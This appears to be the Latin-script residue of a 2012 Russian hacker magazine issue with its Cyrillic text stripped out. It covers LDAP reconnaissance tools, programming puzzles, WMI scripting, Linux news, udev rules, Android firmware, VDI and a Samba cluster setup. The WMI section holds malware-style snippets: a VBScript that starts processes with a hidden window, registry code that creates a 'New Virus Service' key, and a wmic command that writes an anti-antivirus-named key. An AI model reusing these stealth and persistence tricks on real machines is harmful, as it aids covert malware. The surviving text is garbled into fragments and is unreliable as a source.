for i in Keeper.list_instances():
print i
__init__, , instances , list_instances ,

.
:
<__main__.Keeper instance at 0xb72aed4c>
<__main__.Keeper instance at 0xb72aee2c>
, ,
nmap. , tcp-
389, LDAP-. Anonymous
bind OK , , LDAP-,
DN .

,
login:hash,
. .
1. ldapminer. :
ldapminer -h <ip_> <>
-p [port]: 389
-B [bind]:
-w [password]:
-b [base search]: ,
-d [dump all]:
2. luma. ,
.
3. ldp. , Microsoft.
4. openldap.
LDAP-. ldapsearch. ,
.
?
389/tcp
open
ldap
(Anonymous bind OK)
, Metasploit
LDAP-,
. z

1. ? ?
class A:
def __init__(self, name):
self.name = name
def __del__(self):
print self.name,
aa = [A(str(i)) for i in range(3)]
for a in aa:
del a
print 'done'
# ...
2. , :
class Foo
{
public:
Foo(int j) { i=new int[j]; }
~Foo() { delete i; }
private:
int* i;
};
094
class Bar: Foo

{
public:
Bar(int j) { i=new char[j]; }
~Bar() { delete i; }
private:
char* i;
};
void main()
{
Foo* f=new Foo(100);
Foo* b=new Bar(200);
*f=*b;
delete f;
delete b;
}
3. (, access- web-)
.
. ,
,
.
4. .
.
04 /159/ 2012
, ,
.
-
.
,
,

,
,
.
096
deeonis (deeonis@gmail.com)

, , .
,
-
.
:
.
, html- ,
.
,
. , ,
, , . ,
, ,
.
:
, ,
/, , .
, ,
.
04 /159/ 2012
:

class Parser
{
// ..
public:
void parsePage(string url)
{
while (url != "")
{
//
getTopicText();
//
url = getNextUrl();
}
}
private:
void getTopicText()
{
// ...
}
string getNextUrl()
{
// ...
}
}
Parser,
parsePage(). .
parsePage() , .
,
getNextUrl() getTopicText(). ,
, , -,
( , - ),
-, .
void getDataOnPage()
{
// ...
}
string getNextUrl()
{
// ...
}
}

, ,
,
. , , , .
, , ,
, ,
,
, .

class ParserSite2
{
// ..
public:
{
while (url != "")
{
//
getDataOnPage();
//
url = getNextUrl();
, parsePage(),
. , , ,
, . :

class BaseParser
{
// ..
public:
virtual void parsePage(string url) = 0;
}
class ParserSite1: public BaseParser
{
public:
{
while (url != "")
{
//
getTopicText();
}
//
url = getNextUrl();
}
private:
//
Parser::getTopicText
04 /159/ 2012
}
}
private:
097
parsePage ,
, .
, , ,
.
, ,
getNextUrl() ,
parsePage().

. , . .
parsePage()
ParserSite1 ParserSite2 BaseParser. ,
(
),
.
parsePage
, .
void getTopicText()
{
// ..
}
string getNextUrl()
{
// ..
}
}
{
public:
{
while (url != "")
{
//
getTopicText();
//
url = getNextUrl();
}
}
private:
void getTopicText()
{
// ..
}
string getNextUrl()
{
// ..
}
}
098

class BaseParser
{
// ..
public:
{
while (url != "")
{
//
getTopicText();
//
url = getNextUrl();
}
}
protected:
//
virtual void getTopicText() = 0;
virtual string getNextUrl() = 0;
}
{
public:
// parsePage,
//
// ,
//
//void parsePage(string url);
protected:
//
//
void getTopicText()
{
// ..
}
string getNextUrl()
{
// ..
}
}
04 /159/ 2012

{
// ParserSite1
}
, , , getNextUrl() getTopicText().
, ,
. ,

.
BaseParser.
,
. ? , , - , .
-
. BaseParser::parsePage().
-,
,
.
,
?
, , - ().
, ParserSite1
, ParserSite2 - . ,
. ,
- , ParserSite2 .
parsePage .

.
parsePage()
while. .

class BaseParser
{
// ..
public:
{
while (url != "")
{
//
if (stopHook())
break;
// ...
}
}
protected:
//
virtual bool stopHook() {return false;};
// ..
}
.
,
, (
).
False, .
BaseParser
.

{
// ..
protected:
// ,
//
// bool stopHook();
}
{
// ..
private:
int count;
protected:
//
bool stopHook()
{
if (count > 3)
return true;
else
return false;
}
//
void getTopicText()
{
// ...
count++;
}
}
, ParseSite1 , parsePage
. ParseSite2
,
, .
,
parsePage
, ,
.

. .
: ,
. , ,
. z
stopHook() ,
04 /159/ 2012
099
(stannic.man@gmail.com)
WMI:

,

.

,
Windows.
Windows Management Instrumentation (WMI),

. , ][

WMI (xakep.ru/magazine/xa/118/030/1.asp).
.

, WMI
. .
! .
, , WMI
. , , ,
WMI , .
.
?
Const SW_NORMAL = 1
Const SW_HIDE = 0
strComputer = "."
strCommand = "notepad.exe"
Set objWMIService = GetObject("winmgmts:" _
& "{impersonationLevel=impersonate}!\\" _
& strComputer & "\root\cimv2")
Set objStartup = objWMIService.Get("Win32_ProcessStartup")
Set objConfig = objStartup.SpawnInstance_
objConfig.ShowWindow = SW_NORMAL
Notepad
100
Set objProcess = objWMIService.Get("Win32_Process")

intReturn = objProcess.Create _
(strCommand, Null, objConfig, intProcessID)
04 /159/ 2012
WMI:

WMIC /?. ,
.
, , WMIC. WMIC
WMI-.
, ,
. ,
,
process call create "calc.exe".
. , ?
100% , , :

ShowWindow:
, SW_
HIDE = 0. ,
taskmanager ,
! !
-, vbs-, !
const HKEY_LOCAL_MACHINE = &H80000002
strComputer = "."
Set objReg=GetObject( _
"winmgmts:{impersonationLevel=impersonate}!\\" & _
strComputer & "\root\default:StdRegProv")
strKeyPath = "SYSTEM\\CurrentControlSet\\Services\\MyService"
objReg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath
strValueName = "Descrition"
strValue = "New Virus Service"
objReg.SetStringValue _
HKEY_LOCAL_MACHINE,strKeyPath,strValueName,strValue
HKEY_LOCAL_MACHINE\
SYSTEM\CurrentControlSet\Services\
Windows, . , , , ,
. Windows XP, , Win7 HKEY_LOCAL_MACHINE .

HKEY_CURRENT_USER. ,
, . , ,
( , HKEY_LOCAL_MACHINE\
SOFTWARE\Microsoft\Windows\CurrentVersion\Run),
vbs-. .
,
VB- Java. ,
WMI (WMI command-line).
wmic. WMI
,
VBS- JS-.
WMI WMI-, . ,
WMI, .
WMIC QFE
, .
04 /159/ 2012
wmic /NameSpace:\\root\default Class StdRegProv Call CreateKey hDefKey="&H80000002" sSubKeyName="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\fuck_avers"
, ,
,
,
. vb-
- ( ),
(
)
. -, .
, . ,
- , ,
Windows, .
, , , ,
. z
DYNAMICWRAPPERX

DynamicWrapperX (script-coding.com/dynwrapx.html).
WMI, ,
. ActiveX- (-),

VB- , dll-,
, Windows API.
, , CreateWindowEx vb
, . DynamicWrapperX

.
COM- :
"regsvr32.exe dynwrapx.dll", DynamicWrapperX

WinAPI- VB/Java-!
:
Set DX = CreateObject("DynamicWrapperX")
DX.Register "kernel32", "Beep", "i=uu"
DX.Beep 800, 1000
, ,
!
101
UNIXOID
Adept (adeptg@gmail.com)
OpenSource
.
-
: ,
,

,

.

.
102
Gimp 2.8
04 /159/ 2012
lsmod kmod
X: REVOLUTION
Wayland ( C,
10 000 , MIT),
X-! X :
,
.
Wayland (Wayland Compositor
Wayland Server) , X
, , X-,
. Wayland Compositor
Weston,

Wayland. Wayland Compiz Kwin.

Wayland Client ( ).

, X Server,
.

.
Wayland ,
Direct Rendering (DRI), KMS (Kernel Mode
Setting) GEM (Graphics Execution Manager),
Linux
Intel, Radeon Nouveau.

( , X11).
Wayland

,
.
(, ) Wayland :
Qt, GTK, EFL (Enlightenment Foundation Library),
Clutter, SDL. ,
(
),
X.Org- Wayland-
04 /159/ 2012
(
).
Wayland
( 2008 ),
, - . , 1.0
,
.
KMOD: EVOLUTION

RedHat
, ,

Linux ,
: goo.gl/RWgbf. ,
kmod.
module-init-tools (,
: lsmod,
modprobe, rmmod ), libkmod,

( LGPLv2 ).
udev.

modprobe ( ,
), libkmod

.

udev .
udev, kmod
systemd. Arch Linux, ,
kmod 4. Debian kmod 3.
SYSLOG: DESTRUCTION
Systemd (
SysVinit Upstart),
.
,
Journal, systemd
38. ,
syslog, .
syslog, , .
syslog
- :
, mysql
10000, .
, .

.
.
Syslog , Linux:
utmp/wtmp/btmp, lastlog, ,
.
,
.
-
,
(
).
syslog , : ,
.
,
.
:
, .
.
:

,
DoS-.

.
coredump.
103
UNIXOID

.
Journal :
.
,
.
, .
,
.
,

, .

(, ).
git.
API syslog (
) .

.

.
, .

.
, utmp/wtmp,
.
SUID
, .
,
tail, less grep .

.
,

,
-
, .
/bin,/sbin,/lib(/lib64) /usr.
Fedora ( ,

RPM-).

.
,
read-only,
.
Solaris 11.
SUID/SGID- capabilities ,

. SUID-.
chroot, ,
libvirt-sandbox.
libvirt, ,
-,
read-only.
Fedora 17.
-, ,

Fedora :
.
Canonical
.
Ubuntu HUD (Head-Up Display): ,

UEFI (Unified Extensible Firmware Interface)
BIOS,
- , ,
, .
UEFI , ( )

GPT ( MBR).
UEFI . .
UEFI 35 ( ,
Linux 30 ),
2 200 .

.
UEFI,
2.3.1, secure boot. ,
: (,
SHA-256 ), (, ,
)
(RSA, 2048 ),
. ( )
.
, (,
MBR). ,
( )
,
104
.
( Gentoo), , ,
,
- UEFI. Red Hat, Canonical
Linux Foundation
, FSF
, secure boot
restricted boot ( ).
, ,
, Grub2
GPLv3, ,
.
Grub Legacy
GPLv2, GPLv3.
UEFI secure boot
,
. ,
Microsoft ,
/ Compatible with Windows 8,
Secure Boot.

. ARM
secure boot. :
( HP Dell) ,
secure boot.
04 /159/ 2012
,

. ,

.
. , , HUD
,
. , . ,
, HUD
Ubuntu 12.04.

,
,
,
.
.
IPv6. . , IPv4 World IPv6 Day, IPv6
.
IPv6 NAT. , , ,
, netfilter
.
FIOPS (Fair Input/Output Operations Per
Second) /, SSD.

CFQ ( ),
SSD, ,
,
,
.
CFQ
read/write .
, , ,
, Linux 3.5 .
ext4-snapshots
ext4 ( , btrfs).

LVM:

,

. , ,

ext3 (NEXT3)
.
Gimp 2.8, , -

.

OpenSource- id Tech 4, Doom 3.
Zenimax (
)
GPLv3 ( ).
04 /159/ 2012

,
.
.
Nftables iptables/netfilter. :
ABI, (iptables, arptables
ebtables ,
),
(-

). (
][ #127), , ,
, iptables. Fedora, ,

firewallD,
. Fedora
17 , ,
.

Linux
Linux Foundation.
: Maemo
Nokia (
Nokia 770, N800,
N810 N900 2005 ) Moblin

Intel ( 2007 ). 2010
Nokia Intel
Meego,

Maemo Moblin. ,

,
Linux Foundation.
N9 Nokia Meego, Windows Phone.
, Linux
Foundation LiMo
(Linux Mobile) Foundation
Tizen
HTML5. Meego, ,
Mer.
Tizen Samsung Bada.
, ,
,

.

. ,

. z
INFO

,
.

TiVo.
Wayland X Server
utmp/wtmp/
btmp
,

,
/

.

systemd
][ 148.
WWW

FAQ
wayland:
goo.gl/SNq3E.

X12: goo.
gl/Mi23E.
Wayland. X.Org
105
UNIXOID
(zobnin@gmail.com)
KOBJECTS, SYSFS,
UDEV, UDISKS
UPOWER
Linux
2.6
sysfs,

.
sysfs

,

.
,
, .
106
, sysfs
, Linux .

, , udev
( /dev), udisks
( ) upower ( ,
ACPI
, sysfs).
.
KOBJECTS SYSFS
2.5,
2.6, , ,
. , KObject ,

, . ,
, SCSI-,
K-,
, - . , usb- usb-.
- (kset) , .
04 /159/ 2012
/sys/class/ .
/sys/device , ,
-, .
, /
sys/devices . sysfs :
/sys/firmware/ firmware,
;
/sys/fs/ ,
FUSE ( ext4 );
/sys/kernel/
(, );
/sys/module/ , ,
( parameters,
);
/sys/power/ .
modules.alias

ddfs (Device
Drivers FileSystem),
- .
sysfs,
Linux. sysfs ?
sysfs
- , - ,
,
. , ,
, SATA-
, , ,
. ,
, ,
( ) .
. :
$ cat /sys/class/net/eth0/address
MAC- eth0.
/sys/class/net/eth0,
, ,
.
cat /sys/block/sda/size
sda, 512- .

sysfs .
,
, , .
UDEV
sysfs, , ,
? . Linux , , . -
procfs, ioctl-
, ( dmidecode). ,
, . sysfs
: ,

,
plug and play.
, sysfs
, udev, /dev
. Udev
netlink-, (
uevent) , USB- .
, ,
sysfs,
. , sysfs,
/dev,
# echo performance > /sys/devices/system/cpu/cpu0/cpufreq/scaling_governor
( , ) .
sysfs,
. ,
: class, block,
devices. , . ,
sysfs :
/sys/device/ , ;
/sys/block/ ;
/sys/bus/ , ;
04 /159/ 2012
sysfs
107
UNIXOID
udevadm monitor udev
minor/major-.
,
(, vendor , model
), sysfs modalias,
"pci:v000010ECd00008139sv00001734sd
000010B8bc02sc00i00". , udev
.
,
. /lib/
modules/_/modules.alias,
modprobe. udev
, modprobe
modalias .
:
# modprobe pci:v000010ECd...
udev,
devfs, ,
,
/dev,
,
sysfs.
, ,
/dev ,
. udev-.
/lib/udev/rules.d, /etc/udev/rules.d.

.
, udev
d-bus. ,
, PolicyKit,
. ,
udisks --show-info /dev/sda

. -
,
.

udev, ,
, udisks upower.
UDISKS UPOWER
udisks upower
.
DeviceKit, udev, . udev, sysfs d-bus ,

.
, sysfs,
, udev,
, -
. udisks upower
, , . Udisks, ,
(
udev) :

, , / ,
, . ,
root sysfs ,
d-bus,
PolicyKit . , udisks (,
- ), udev.
udisks ,
. , ,
:
$ udisks --dump

, UDEV
D-BUS
108
,
, SMART:
$ udisks --show-info /dev/sda
:
$ udisks --eject /dev/cdrom
04 /159/ 2012
udev
:
$ udisks --set-spindown /dev/sda --spindown-timeout
, , root. DE udisks
. , devmon. udisks devmon, ~/.xsession
( fluxbox ):
, . ,
,
,
.
,
,
udev, sysfs ACPI.
udisks, upower , , ,
.
upower --dump.
exec ck-launch-session bash -c "devmon & fluxbox"
.
upower -
04 /159/ 2012
sysfs udisks ,
. sysfs:
109
UNIXOID
INFO
1. :

sysfs,

/sys/class,

.
$ grep -r . /sys/class/net/eth0/statistics
2. , ( - SSD
):
# echo 0 > /sys/block/sdb/queue/rotational

sysfs
uevent,

major/minor-.

udev

.
3. SCSI- ( ):
# echo "- - -" > /sys/class/scsi_host/host0/scan
4. USB-:
$ for i in `find /sys/devices/*/*/usb* \
-name level`; do echo -n "$i: "; cat $i; done
5. (,
):
upower --dump
/mnt.
.
2. :
# cat /sys/devices/virtual/dmi/id/*
6. :
ACTION=="add", KERNEL=="sd</a-z><a-z><0-9>",
ENV{ID_USB_DRIVER}="usb-storage",
RUN+="/bin/cp -a /mnt/%k /backup/%k"
# cat /sys/class/hwmon/hwmon0/temp1_input
7. (
/sys/class/backlight/acpi_video0/max_brightness):

( /backup/_
) cp.
.
# echo 8 > /sys/class/backlight/acpi_video0/brightness
3. :
8. ( mem disk ):
# echo mem > /sys/power/state
, ,
sysfs. ,
.
udev. udev , ,
, . /lib/udev/rules.d () /etc/udev/rules.d.
,
.
/etc/udev/rules.d/99-custom.rules. ?
1. :
ACTION=="add", KERNEL=="sd<a-z><0-9>",
RUN+="/bin/mkdir -p /mnt/%k"
ACTION=="add", KERNEL=="sd</a-z><a-z><0-9>",
RUN+="/bin/mount -o rw,noexec,dmask=000,fmask=111,utf8
/dev/%k /mnt/%k"
ACTION=="remove", KERNEL=="sd</a-z><a-z><0-9>",
RUN+="/bin/umount /mnt/%k"
, USB-. USB Mass Storage
110
SUBSYSTEM=="net", ATTR{address}=="aa:bb:cc:dd:ee:ff",
NAME="lan0"
SUBSYSTEM=="net", ATTR{address}=="ff:ee:dd:cc:bb:aa",
NAME="wlan0"
MAC- . ATTR{address} address sysfs.

4. :
ACTION=="add", SUBSYSTEM=="input", KERNEL=="mouse[1-9]",
ENV{DISPLAY}=":0.0",
ENV{XAUTHORITY}="/home/USERNAME/.Xauthority",
ENV{ID_CLASS}="mouse", RUN+="/usr/bin/synclient TouchpadOff=1"
ACTION=="remove", SUBSYSTEM=="input", KERNEL=="mouse[1-9]",
ENV{DISPLAY}=":0.0",
ENV{XAUTHORITY}="/home/USERNAME/.Xauthority",
ENV{ID_CLASS}="mouse", RUN+="/usr/bin/synclient TouchpadOff=0"
synclient ,
/dev/mouse0,
/dev/mouse1 .
sysfs Linux
,
,
. sysfs+udev+udisks.
,
. z
04 /159/ 2012
UNIXOID
(execbit.ru)

ANDROID-: CYANOGENMOD VS MIUI

Android
?
.

,

: CyanogenMod MIUI.
,

,
,

.
04 /159/ 2012
, CyanogenMod MIUI ,
Android.
, - Google
.
,

(, CyanogenMod
Geeksphone One, ,
).

, ,

.
CYANOGENMOD. ANDROID

OPEN SOURCE
, CyanogenMod (cyanogenmod.com). , Android
.

Android.
xda-developers,
Cyanogen ( ,
Samsung),
,
JesusFreke. CyanogenMod Android,
T-Mobile G1 (Android 1.5). ,
Cyanogen ,
,
,
, Google.
CyanogenMod
,
56 ,
Google Nexus S HTC Incredible, HTC Tattoo Huawei
111
UNIXOID
(, ).
OpenVPN,
.
(,
tap-to-focus), .

.

CyanogenMod
CyanogenMod
U8220.
xda-developers.com.
7.1.0
Android 2.3.7.
, Android 4.0.3 (,
8.0 Android 3.0,
Google

). CyanogenMod
9,
.
- MIUI

CyanogenMod, ? .
-, CyanogenMod
,
, : , SSH-,
bash busybox.
-, CyanogenMod ,
,

. CyanogenMod
,

, ,
.
CyanogenMod
, .
,
CyanogenMod,
Android:
/etc/init.d. CyanogenMod,
Linux,
(,
samba ftpd) (
, ).

. CyanogenMod ,
ext2- .
bash, busybox
112
ssh,
SSH adb.
SSH- .

.
,
T-Mobile.
Android Market.

FLAC.
,
.
Wi-Fi, Bluetooth USB-
( CM
Android 2.2).
,
.

, Bionic.
,
, ?

. ? ,
:
root-,
(recovery),
Google- (, Gmail ).
root, boot-
NAND-,
(, ,
).
Android root
, -
(/bin/login) UID (/bin/su).
Android-.
:
Android zroot (goo.gl/mp6wg), Windows
Linux SuperOneClick (goo.gl/HIbN),
mono.
Android,
. ,
google.

recovery. SuperOneClick , Rom Manager,
SuperOneClick
04 /159/ 2012

(goo.gl/W8dJK). ,
Flash ClockworkMod Recovery. (
: cyanogenmod.com/devices)
Google (goo.gl/6OchT). Rom Manager
, Reboot into
Recovery. ( , ),
,
Wipe data/factory reset,
,
Yes. , Install zip from sdcard, ,
Yes. Google. Reboot system
now.

. ,
. .
.
, MIUI.
,
: Menu Settings CyanogenMod Settings
Interface Notification Power Widget
Widget Buttons.

.
: Menu Settings
Application Settings Development Stop
app via long-press.
CyanogenMod

.
: Menu Settings
CyanogenMod Settings Lockscreen
Lockscreen gestures.
LED-
: Menu Settings CyanogenMod
Settings Interface > LED notifications.
Android, CyanogenMod
, , .
,
,
: Menu Settings
CyanogenMod Settings Application Settings
Install location.
CyanogenMod . : Menu Settings
CyanogenMod Settings System Update
notifications.

: Menu Settings
CyanogenMod Settings Status bar tweaks
Battery Status Style Percentage.

, : Menu
Settings CyanogenMod Settings Input
Volume button music controls.
: Menu
Music Settings Enable gestures.

(, ),
(Menu Settings Applications
Manage Application),
Permissions ,
.

:
Menu Settings CyanogenMod settings
Lockscreen Unlock options Menu unlock.
,

, ,
: Menu
CyanogenMod settings Input Long press
home settings Number of recent apps.

: Menu CyanogenMod settings
Performance Disable boot animation.
Lock home in
memory,

.
MIUI
04 /159/ 2012
113
UNIXOID
MIUI Samsung Galaxy S
Screenshot,
SD-, DCIM/
Screenshots.
CyanogenMod
DSPManager,
(, ).
MIUI. ANDROID -
MIUI ( Me
You I). CyanogenMod, ,
MIUI
Xiaomi Tech (xiaomi.com),
iOS
Android. 2010 ,

Android,
, , ,
. Xiaomi Tech

CyanogenMod
, , .

,
, CyanogenMod.
114
MIUI
. ,
,

. ,
,
,
,
,

. , , ,
,
.
, .
, -
MIUI, CyanogenMod, ,
, Android:
1. T9-.
,
Dialer One,
.
2.
, .
,
,
, .
3. . CyanogenMod, -

, MIUI
/. , , - ,
.
4. .

, 3G .

, .
5.
- . ,
,
,
.
6. (
).
7. OTA- .

.
8. . MIUI
, ,
04 /159/ 2012
INFO

Google,
Google
Nexus One, Google
Nexus S Samsung
Galaxy Nexus,

root-.
MIUI

: MI,
Mobile
Internet (,
,
Mission Impossible),
UI User Interface.

MIUI
,
.
9.
.
, Android.
10. .
,
.
MIUI
iOS,
iPhone, . MIUI iOS,
: , ,
,
. iOS:
,

,
, , .
, ,
,
( ,
- ).
MIUI .
, ssh
, , , ext2-. ,
, , ,

.
04 /159/ 2012
MIUI CyanogenMod,
,
Google, Gmail,
,
.

. ,
MIUI
, ,
.
, ,
miuiandroid.com (
ROMs).
miui.su,

.

. :
,
2.3.7,
- 2.1.20, ICS
(Android 4.0) 2.1.13. , .
.
3.
.
4.
.
5.
.
6. , .
7.
(SettingsSystem Battery
Notification Indicator Style Percentage).
8. , .
9.
,
.
10.

,
.
MIUI
. ,
,
.
, ,
. , MIUI.
1. .
2.
CyanogenMod
MIUI ,

.
,

.
,
, . z
115
SYN/ACK
SYN/ACK
(grinder@synack.ru), (j1m@synack.ru)
VDI WIN2K8R2
LINUX
116
, ,
, ,
,
.
,

,
, .
.
04 /159/ 2012
Hyper-V
VDI WIN2K8R2
Terminal Services Win2k8R2,
, Remote Desktop
Services (RDS). , VDI
(Virtual Desktop Infrastructure) Win2k8R2
DaaS (Desktop as a Service).
RD Virtualization Host Hyper-V
VM, RDS RDP.
(
) ,
.
, , ,
. .
TS/RDS VDI ,

,
.
, ,
, ,
. : , .
:
Personal Virtual Desktops ,
, ,
VD;
Virtual Machine Pool
VDI, , ,
,
.
VD .
, (,
, ), , ,
.
, VD,
,
. : -
04 /159/ 2012
AD
,
, .
, , AD ( Win2k8R2),

(Active Directory -> ), (Personal Virtual Desktop).
VDI RDS:
RD Web Access , ,
;
RD Gateway ,
;
RD Connection Broker VM, , ;
Remote Desktop Session Host (RDSH) , RemoteApp;
RD Virtualization Host (RDVH)
VDI, Hyper-V ( ,
);
RD Licensing RDS CALs, 120
.
VDI , VDI RD Web Access RDP ,
.
:
Hyper-V, RDP, -
VDI
,

117
SYN/ACK
SYN/ACK
. ,
Hyper-V RDS (Add RD Virtualization Host Server) (onfigure Virtual Desktops Wizard),
Hyper-V, RD
Connection Broker RD Web Access.
. AD (Assign Personal Virtual Desktop). VD
RD Connection Broker Virtual
Machine Pool Creation Wizard,
RD Connection Broker.
(BPA).
- QVD Web Administration Tool
SPICE
UNIX
, , ,
. UNIX . X-,
,
. , 80-.
X- .
, ,
X- .
,
. , ,
.
, . Spice
. Spice ,
, ,
, USB- .
,
,
, , -, , (
, , ). Spice
-
,
, , ,
, - .
, Spice ,
.

. , Spice,
, Spice-, /,
Spice-
( ).
Red Hat, Spice 2009 ,
, . Spice
QEMU, libvirt virt-manager virsh. Spice,
, X-,
spicec, X
Window, Firefox, GTK Qt.
,
Spice- :
QVD
118
1. :
$ sudo apt-get install qemu-kvm
04 /159/ 2012
- Ulteo
$ qemu-kvm -spice port=1234,disable-ticketing \

-hda ////
,
:
2. :
$ sudo /etc/init.d/libvirtd start
$ sudo apt-get install spice-client

$ spicec -h localhost -p 1234
, virt-manager libvirtd:
, - ,
,
virt-manager.
, virt-manager ,
libvirtd ssh. ,
qemu, libvirt libvirtd:
$ sudo apt-get install virt-manager

$ virt-manager -c qemu+ssh://root@server.com/system
$ sudo apt-get install bridge-utils dnsmasq \

kvm qemu libvirt libvirt-bin
, , , .
UNIX, Spice- xorg-video-qxl,
.
, -> ,
, Graphics,
Spice server,
MED-V APP-V
,
WinXP Win7 Vista
. ,
.
. MEDV (Microsoft Enterprise Desktop Virtualization, clck.ru/WQqT)
VDI, .
XP Mode,
(WinXP/Vista) Virtual
PC. ,
,
.
App-V (Microsoft Application Virtualization)
,
.
04 /159/ 2012
(
), . , App-V
,
( MED-V),
.
, ,
.
Win7 Home/Starter
.
MED-V, MDOP (Desktop Optimization Pack, ).
, MED-V, ,
, MED-V 2.0 App-V
System Center Configuration Manager.
119
SYN/ACK
SYN/ACK
SPICE
,
, USB-,
. qxl,
qxl. , Spice.
,
Spice- . Linux , X-
.

:
spicec -f -h _ -p _ -w
~/.xsession ,
exec, ~/.config/
autostart, .
Spice-

.
( , ), .
, Spice .
virt-manager .
(
-> Clone) . ,
, 10-15, ,
virt-manager (
).
QVD
QVD (Quality Virtual Desktop, theqvd.com)
, VDI
, GNU/Linux VM
.
VDI . VDI,
. VD (overlays),
( )
. .
Windows Linux,
Android.
QVD ,
(Return on Investment, ROI). , BBVA Bancomer.
QVD KVM (Kernel Virtual Machine),
NX,
. LDAP.
:
QVD-,
PostgreSQL. ,
. , QVD
35 000 -
QEMU VM
Guest
vdagent
qxl driver
vmc
virtio-serial
QXL (cirrus)
standard guest drivers
Keyboard
Mouse Tablet
AC97
ES1370
(nic)
record
playback
(tunnel)
spice server
main
display
cursor
inputs
spice client
users machine
(printer)
Spice
120
04 /159/ 2012
INFO
ULTEO OPEN VIRTUAL DESKTOP (OVD)

OVD (ulteo.com) ,
Mandrake/Mandriva Linux,
-

Linux Windows.
,
Java .
Amazon EC2. OVD
: ,
, .
.
LDAP/AD CAS.
RC8 3.0.

HTTPS/443,
RDP (TCP/3389).
,
.
, .
( )
Ubuntu 10.04 LTS, RHEL 5.5 ( CentOS Fedora), Novell SLES 11 SP1, Win2k3/2k8/R2 (
). DVD,
Ubuntu.
Ulteo
,
, ,
,
.
ORACLE VDI
, Oracle Virtualization
,
( Sun Ray)
(Sun Fire, Sun Storage). Oracle VDI
connection broker

RDP SGD (Oracle Secure Global Desktop).
(Virtualization Layer)
VirtualBox, VMware vSphere, Hyper-V, ,
RDP.
(Windows, Solaris,
Linux, *nix ). SGD
-,
(,
Java[RR1]),
WWW
(
cookie, , ).
, VDI
Java -. kiosk
mode
.
Array Resilience

.
, ,
,
32- .
AD/LDAP.
Solaris Oracle Enterprise
Linux ( RHEL).
9 000 ,
. ,
VM IP.
: L7R, HKD (House Keeping
Daemon), / VM , Node
L7R HKD. NAS/SAN .
- QVD Web Administration
Tool (WAT, Perl Catalyst) (qvd-admin).
QVD Community, Commercial Cloud ( QVD).
.
Ubuntu 10.04
LTS SLES, (
Ubuntu 10.10). , QVD
Linux. Ubuntu 10.04
LTS ,
:
$ sudo apt-add-repository \
'deb http://theqvd.com/debian lucid main'
$ sudo apt-get update
04 /159/ 2012

Win2k8 ][
09.08;
HyperV
, ][
02.09;
][ 11.10

VMware View 4.5;
Win2k8R2 RDS

/
IP-

,

IP;
TS/RDS
VDI
,

;

QVD

BBVA
Bancomer.

Microsoft
RDS
VDI: clck.ru/WddP;
QVD:
theqvd.com.
WARNING

HKEY_LOCAL_
MACHINE\SYSTEM\CurrentControlSet\Control\TerminalServer

AllowRemoteRPC 1.
qvd-*.
, :
$ sudo apt-get install \
qvd-demo-single-instance-nosupport qvd-admin
WAT, 3000 , .
, , ( , ).
/var/lib/qvd/storage (
NFS): homes (qcow2 /home), images (), overlays ( )
staging.
,
,
, . z
121
SYN/ACK
SYN/ACK
(zobnin@gmail.com)

SAMBA
122
0122

.

, NAS,

,
.
04
04 /159/
/159/ 2012
2012
, CTDB
,
, GNU/Linux Samba.
, :
.
Samba
, ,
Linux Samba,

. ,
.
, RAID1-,
,
. , , ,
.
.
, -
,
c DRBD . :
Samba, ,
.
UNIX CIFS
Samba
, TDB,
Windows SID Unix UID/GID,
, .
Samba ,
TDB, .
, CTDB (Cluster TDB),
Samba
. CTDB

, .
04
04 /159/
/159/ 2012
2012

Samba .
1. ,
.
2. RAID1 .
3. RAID1-.
4. Samba.
5. CTDB
Samba.
,
.

, ,
. /dev/sda
( Debian), /dev/sdb
Samba. ,
.

RAID1. DRBD -,
.
,
,
.
, , 10.0.0.1 10.0.0.2
IP-, -, 192.168.0.1 192.168.0.2
,
(
, ).
IP-
:
# apt-get install drbd8-utils
/etc/drbd.conf
:
# vi /etc/drbd.conf
global { usage-count no; }
common { syncer { rate 100M; } }
123
0123
SYN/ACK
SYN/ACK
(zobnin@gmail.com)
DRBD
resource r0 {
protocol C;
startup {
wfc-timeout 15;
degr-wfc-timeout 60;
}
net {
# (primary/primary)
allow-two-primaries;
after-sb-0pri discard-zero-changes;
after-sb-1pri consensus;
after-sb-2pri disconnect;
#
shared-secret "";
cram-hmac-alg sha1;
}
#
on node1 {
device /dev/drbd0;
disk /dev/sdb;
address 10.0.0.1:7788;
meta-disk internal;
}
#
on node2 {
-
,

124
0124
device /dev/drbd0;
disk /dev/sdb;
address 10.0.0.2:7788;
meta-disk internal;
}
}
,
, ,
. ,
.
disk ,
, address IP-
DRDB. .
,
:
# drbdadm create-md r0
drbd ( ):
# /etc/init.d/drbd start
,
, DRBD :
# drbdsetup /dev/drbd0 primary -o
,
, /proc/drbd:
# cat /proc/drbd
04
04 /159/
/159/ 2012
2012
. ,

.
( ),
OCFS2 Oracle ( , GFS2).
OCFS2 , , ,
:
# apt-get install ocfs2-tools
/etc/ocfs2/cluster.conf.

:
( /samba
Samba):
# mkdir /samba
# echo "/dev/drbd0 /samba ocfs2 noatime 0 0" >> /etc/fstab
# mount /dev/drbd0
. ,
.
.
SAMBA
# vi /etc/ocfs2/cluster.conf
cluster:
node_count = 2
name = ocfs2
node:
ip_port = 7777
ip_address = 192.168.0.1
number = 1
name = node1.cluster.local
cluster = ocfs2
node:
ip_port = 7777
ip_address = 192.168.0.2
number = 2
name = node2.cluster.local
cluster = ocfs2
ocfs2 :
node1.cluster.local node2.cluster.local.
, IP- /etc/hosts .
,
ocfs2
, . ,
IP-.
o2cb:
# /etc/init.d/o2cb start
DRBD-.
:
,
Samba. ,
, CTDB, Samba,
.
, Samba :
[global]
clustering = yes
idmap backend = tdb2
private dir=/samba/ctdb
fileid:mapping = fsid
vfs objects = fileid
[public]
comment = public share
path = /samba/public
public = yes
writeable = yes
only guest = yes
/etc/samba/smb.conf , /samba/ctdb CTDB. ,

,
OCFS2 .
, , :
# mkdir /samba/ctdb
# mkdir /samba/public
# chmod 777 /samba/public
# mkfs.ocfs2 -L "ocfs2" /dev/drbd0
# smbpasswd -a root
CTDB-
04
04 /159/
/159/ 2012
2012
125
0125
SYN/ACK
SYN/ACK
(zobnin@gmail.com)

.
CTDB :
# apt-get install ctdb
, ,
,
. Fedora/RedHat /etc/
sysconfig/ctdb, Debian/Ubuntu /etc/default/ctdb. :
# lock-
CTDB_RECOVERY_LOCK="/samba/ctdb/lock"
# ,
#
CTDB_PUBLIC_INTERFACE=eth0
# ,
CTDB_PUBLIC_ADDRESSES=/etc/ctdb/public_addresses
